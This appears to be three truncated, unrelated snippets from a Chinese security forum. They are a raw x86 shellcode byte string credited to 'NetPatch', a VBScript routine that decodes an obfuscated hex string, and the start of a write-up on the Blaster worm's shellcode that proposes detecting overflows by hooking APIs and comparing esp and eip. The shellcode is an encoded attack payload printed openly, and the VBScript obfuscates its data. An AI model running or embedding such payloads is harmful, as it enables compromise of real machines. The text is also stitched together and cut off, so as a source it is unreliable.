'code by NetPatchcode="\x29\xc9\x83\xe9\xa1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92\x06\x5b\x18\x83\xeb\xfc\xe2\xf4\x79\x16\x01\x52\xa1\xcf\x3d\xa1\xae\x07\xdb\x2c\x98\x9f\xb9\xe2\x79\x03\xb3\xf3\x6d\xf9\xa4\x68\xde\x9f\xc2\x81\x51\xfb\x63\xb1\x0b\x9f\xc2\x0a\x4b\x93\x49\xf1\x17\x32\x4...

[code]Dim enTmp,enstr,a,bb enstr=Str2Hex("RHptd4RPFZVOdoVQTrvWTnTp4n6PVN6QTop1tnau1hsU") For i = 1 To Len(enStr) step 6    enTmp =Array(Mid(enStr,i,6)&"00")    sz =Split(enTmp(0), ",", -...

2年前“冲击波”病毒爆发时，我曾经对它的SHELLCODE进行过分析，现在把我当时写的分析献出来，  让大家看看“一代名毒”是怎样的。一般来说，shellcode都是这样写的，因此只要hook shellcode必须调用的api，判断esp和eip  的差值如果在0x1000以内（也就是说代码在堆栈里运行），那么基本上可以确认系统受到缓冲区溢出攻击，该进程必须马上退出。  当然，有些更厉害的shellcode采用直接调用native api,raw socket收发包等技术，hook api监视...